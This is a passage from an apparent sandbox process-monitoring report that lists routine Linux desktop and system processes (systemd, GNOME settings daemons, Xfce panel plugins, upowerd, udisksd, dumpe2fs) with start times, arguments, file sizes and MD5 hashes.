                                                                  File size:35136 bytes
                                                                  MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/lib/systemd/systemd
                                                                  Arguments:-
                                                                  File size:1620224 bytes
                                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/libexec/gnome-session-binary
                                                                  Arguments:-
                                                                  File size:334664 bytes
                                                                  MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-media-keys
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/libexec/gsd-media-keys
                                                                  Arguments:/usr/libexec/gsd-media-keys
                                                                  File size:232936 bytes
                                                                  MD5 hash:a425448c135afb4b8bfd79cc0b6b74da

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/xfce4-panel
                                                                  Arguments:-
                                                                  File size:375768 bytes
                                                                  MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                                  Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
                                                                  File size:35136 bytes
                                                                  MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/libexec/gnome-session-binary
                                                                  Arguments:-
                                                                  File size:334664 bytes
                                                                  MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-screensaver-proxy
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/libexec/gsd-screensaver-proxy
                                                                  Arguments:/usr/libexec/gsd-screensaver-proxy
                                                                  File size:27232 bytes
                                                                  MD5 hash:77e309450c87dceee43f1a9e50cc0d02

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/lib/systemd/systemd
                                                                  Arguments:-
                                                                  File size:1620224 bytes
                                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/lib/upower/upowerd
                                                                  Arguments:/usr/lib/upower/upowerd
                                                                  File size:260328 bytes
                                                                  MD5 hash:1253eea2fe5fe4017069664284e326cd

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/xfce4-panel
                                                                  Arguments:-
                                                                  File size:375768 bytes
                                                                  MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                                  Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
                                                                  File size:35136 bytes
                                                                  MD5 hash:ac0b8a906f359a8ae102244738682e76
                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/libexec/gnome-session-binary
                                                                  Arguments:-
                                                                  File size:334664 bytes
                                                                  MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-sound
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/libexec/gsd-sound
                                                                  Arguments:/usr/libexec/gsd-sound
                                                                  File size:31248 bytes
                                                                  MD5 hash:4c7d3fb993463337b4a0eb5c80c760ee

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/xfce4-panel
                                                                  Arguments:-
                                                                  File size:375768 bytes
                                                                  MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                                  Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
                                                                  File size:35136 bytes
                                                                  MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/libexec/gnome-session-binary
                                                                  Arguments:-
                                                                  File size:334664 bytes
                                                                  MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-a11y-settings
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:21
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/libexec/gsd-a11y-settings
                                                                  Arguments:/usr/libexec/gsd-a11y-settings
                                                                  File size:23056 bytes
                                                                  MD5 hash:18e243d2cf30ecee7ea89d1462725c5c

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/xfce4-panel
                                                                  Arguments:-
                                                                  File size:375768 bytes
                                                                  MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                                  Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
                                                                  File size:35136 bytes
                                                                  MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/libexec/gnome-session-binary
                                                                  Arguments:-
                                                                  File size:334664 bytes
                                                                  MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/bin/xfce4-panel
                                                                  Arguments:-
                                                                  File size:375768 bytes
                                                                  MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                                                  Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
                                                                  File size:35136 bytes
                                                                  MD5 hash:ac0b8a906f359a8ae102244738682e76

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/libexec/gnome-session-binary
                                                                  Arguments:-
                                                                  File size:334664 bytes
                                                                  MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                  Start time (UTC):23:15:20
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/bin/sh
                                                                  Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-power
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):23:15:21
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/libexec/gsd-power
                                                                  Arguments:/usr/libexec/gsd-power
                                                                  File size:88672 bytes
                                                                  MD5 hash:28b8e1b43c3e7f1db6741ea1ecd978b7

                                                                  Start time (UTC):23:15:21
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/lib/systemd/systemd
                                                                  Arguments:-
                                                                  File size:1620224 bytes
                                                                  MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                  Start time (UTC):23:15:21
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/lib/upower/upowerd
                                                                  Arguments:/usr/lib/upower/upowerd
                                                                  File size:260328 bytes
                                                                  MD5 hash:1253eea2fe5fe4017069664284e326cd

                                                                  Start time (UTC):23:15:27
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/lib/udisks2/udisksd
                                                                  Arguments:-
                                                                  File size:483056 bytes
                                                                  MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                  Start time (UTC):23:15:29
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/lib/udisks2/udisksd
                                                                  Arguments:-
                                                                  File size:483056 bytes
                                                                  MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                  Start time (UTC):23:15:29
                                                                  Start date (UTC):06/10/2024
                                                                  Path:/usr/sbin/dumpe2fs
                                                                  Arguments:dumpe2fs -h /dev/sda2
                                                                  File size:31112 bytes
                                                                  MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4